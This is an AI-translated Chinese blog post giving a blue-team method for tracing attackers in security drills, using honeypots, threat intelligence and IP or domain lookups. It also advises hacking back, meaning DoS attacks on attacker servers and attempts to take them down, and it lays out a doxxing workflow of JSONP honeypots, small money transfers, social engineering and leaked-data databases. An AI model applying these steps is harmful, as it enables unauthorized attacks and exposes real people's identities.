xfeng

xfeng

健身 技术 阅读 思考 记录
tg_channel
tg_channel
github
bilibili
tg_channel
HomePortfoliosArchivesAbout

Source Analysis

#溯源81
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The summary discusses the importance of tracing and analyzing the source of attacks in defense strategies. It emphasizes the need to go beyond simply blocking IP addresses and focus on tracing back to hackers' identities, attack paths, and motives. Various tools and techniques, such as honeypots, WAF, IDS, and threat intelligence platforms, are mentioned for gathering and analyzing data to identify and counteract attacks effectively. The process involves capturing attack sources, analyzing data, utilizing IP and domain tracing methods, and leveraging threat intelligence for a comprehensive understanding of attackers' profiles and activities. The use of social engineering techniques and cross-referencing information from various sources are highlighted for successful source tracing.

image

1. Overview#

In general, source tracing in attack and defense drills involves: reconstructing the attack chain, tracing back to the hacker's virtual identity, real identity, tracing back to the attacking team members, and taking control of the attacker's host.

In general, the data obtained by blue team members comes from the following sources:

  • Honeypot platforms
  • Traffic detection platforms
  • WAF, IDS, IPS
  • Phishing emails

After obtaining the data information, we need to analyze the data.

Key information to focus on:

  • IP addresses
  • DNSLOG, C2 addresses
  • Information in phishing emails
  • Hacker IDs captured by honeypots

Different devices have different analysis approaches.

2. General Process of Source Tracing#

Capturing the source of the attack

  • Security device alarms (scanned IP, intrusion events)
  • Log traffic analysis
  • Abnormal server resources (abnormal files, processes, ports, scheduled tasks, etc.)
  • Phishing emails (obtaining malicious file samples)
  • Honeypot system (capturing attacker behavior)

Countermeasures for source tracing

  • IP geolocation technology
  • ID tracking (search engines, social platforms, etc.)
  • Website URLs (whois query, etc.)
  • Malicious samples (extracting sample features, username IDs, etc.)

Attacker profiling

  • Reconstructing the attack path
  • Attack objectives
  • What network proxies are used
  • Attack methods (web penetration, close-source penetration, social engineering, etc.)
  • Obtaining information about the attacker's: virtual identity, real identity, contact information, organizational situation, etc.

3. WAF, Traffic Detection Devices#

  • Request data packets -> may contain bounced C2 addresses or DNSLOG addresses
  • Certain registrable websites -> obtain attacker's registered phone number, ID card information, etc.
  • IP addresses -> analyze the attack behavior path -> filter foreign zombie IP addresses
  • Pay special attention to attack traffic from cloud servers such as Alibaba and Tencent

4. Threat Intelligence Analysis#

After obtaining the attack IP, we can search on threat intelligence analysis platforms to obtain information such as host information, recent activities, and domain name resolution.

Useful websites:

ThreatBook Online Intelligence Community

Qianxin Threat Intelligence Center

360 Threat Intelligence Center

VenusEye Threat Intelligence Center

RiskIQ Community

4.1 Host Information#

Pay special attention to port information

  • If there is a web application port -> countermeasure (view port services, masscan, nmap port scanning, vulnerable ports)
  • CS TeamServer 50050 -> script cracking, DDOS attack (batch phishing horse, start hundreds of processes, DDOS the red team's cs end)

4.2 Domain Name Resolution Records#

Recently resolved domain names associated with the IP

  • If they exist -> continue analysis
  • If they do not exist, and the result of pinging the domain name is not an attack IP, stop the analysis

.cn domain names

5. IP & Domain Name Tracing#

In some cases, attackers may leave behind the IP or domain name they used, usually for downloading malicious code, reverse proxy, etc. After obtaining the IP or domain name used by the attacker, I usually trace it using the following methods:

5.1 IP#

  1. Use threat intelligence queries to obtain the location, ISP, and resolved domain names of the IP
  2. Perform a full port scan of the IP to identify open ports and conduct vulnerability scanning on the service ports, attempting to take down the attacking server
  3. Use network asset mapping engines to search for attack tracing IPs and obtain the services provided by the IP
  4. Query precise location data for the IP
  5. Launch a DoS attack on the services provided by the IP to prevent further attacks
  6. Most attackers use VPS for proxy forwarding or directly for attacks. You can submit a ticket to the VPS provider, explaining the attack behavior of the IP. The service provider may prohibit the attack behavior of the IP or ban the attacker's account.

5.2 Domain Name#

  1. Use Whois queries to obtain email addresses and names
  2. Check the domain name registration information in the Ministry of Industry and Information Technology ICP database
  3. Check the historical Whois information of the domain name
  4. Search the domain name on search engines, may discover the attacker's other account information

Geolocation query:

IP Location Website

Red team attackers may launch attacks using mobile hotspots. We can use geolocation queries to determine their location.

6. Honeypot Tracing#

In modern browsers, the same-origin policy is the core of ensuring user access security. To allow cross-origin requests, JSONP was born.

In HTML, the src attribute of the script tag is not affected by the same-origin policy. By referencing a JavaScript file from a different domain using the script tag, cross-origin requests can be made. This is JSONP.

Honeypots also use this principle to obtain social information.

Obtaining social information through JSONP in honeypots is relatively difficult and generally requires the following conditions to be met:

  1. The third-party website to be obtained allows cross-origin requests and contains sensitive information in the cross-origin information.
  2. The attacker has logged in to the third-party website and has not logged out.

After obtaining social information through honeypots, we generally start from the following aspects:

6.1 QQ Number#

  1. If the obtained information is a QQ number, it is possible to obtain personal information such as the binding of the QQ number to a bank card by making a large transfer to the QQ number. This can generally obtain one character from the first name or last name.
  2. Search the QQ number or the email address associated with the QQ number on Baidu Tieba and other forums, may obtain Baidu Tieba account information
  3. Use Whois to reverse search the QQ email address, may obtain the name or domain name
  4. Search the QQ number on WeChat, may obtain the attacker's WeChat account
  5. Add the QQ number using a secondary account, try to obtain more information through social engineering methods (based on obtaining a large amount of personal information)

6.2 Phone Number#

  1. Transfer money to the account associated with the phone number in Alipay, try to obtain the real user's name corresponding to the phone number
  2. Search the phone number on WeChat, try to obtain the WeChat account
  3. Search the phone number on DingTalk, may obtain part of the real name and work unit
  4. Search the phone number on search engines, may obtain other account information
  5. Check the websites registered with the phone number

6.3 Tieba Account#

  1. Use Tieba Toolbox to obtain the account's homepage and posted content
  2. Check the posted content, may find QQ numbers, phone numbers, email addresses, approximate age, name, etc.

6.4 Social Engineering Databases#

In my opinion, social engineering databases are more used for cross-validation and are not a direct way to obtain data. Therefore, they should be compared with social engineering databases after obtaining sufficient information to confirm the real information.

6.5 Other Account Information#

  1. Search QQ nickname, WeChat nickname, Alipay nickname, Tieba nickname, etc., may obtain information from other platforms such as Weibo, Zhihu, GitHub, and other forums and SNS communities
  2. Detailed examination of the account's information to extract more useful information, such as name, gender, age, address, work unit, school, etc.

6.6 School#

  1. If school information and name are obtained, search the school on search engines to obtain the attacker's major, class, enrollment time, graduation time, student ID, etc.
  2. Inquire on the school's Tieba, QQ groups, etc., to obtain more personal information
  3. For master's and above degrees, search for papers on the China National Knowledge Infrastructure (CNKI) to confirm research directions

6.7 Email#

  1. Check the websites registered with the email address

6.8 Hacker ID Tracing#

  1. Search engines
  2. Major security response centers (SRCs)
  3. Community consultations

7. Conclusion#

The results of source tracing are generally as follows:

  • Name/ID:

  • Attack IP:

  • Geolocation:

  • QQ:

  • IP address company:

  • IP address associated domain names:

  • Email:

  • Phone number:

  • WeChat/Weibo/SRC/ID proof:

  • Profile picture:

  • Jump server:

  • Associated attack events:

In the process of source tracing, the most important thing is social engineering databases, followed by the aforementioned source tracing analysis approaches.

If there are honeypot devices, try to set them to high interaction.

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.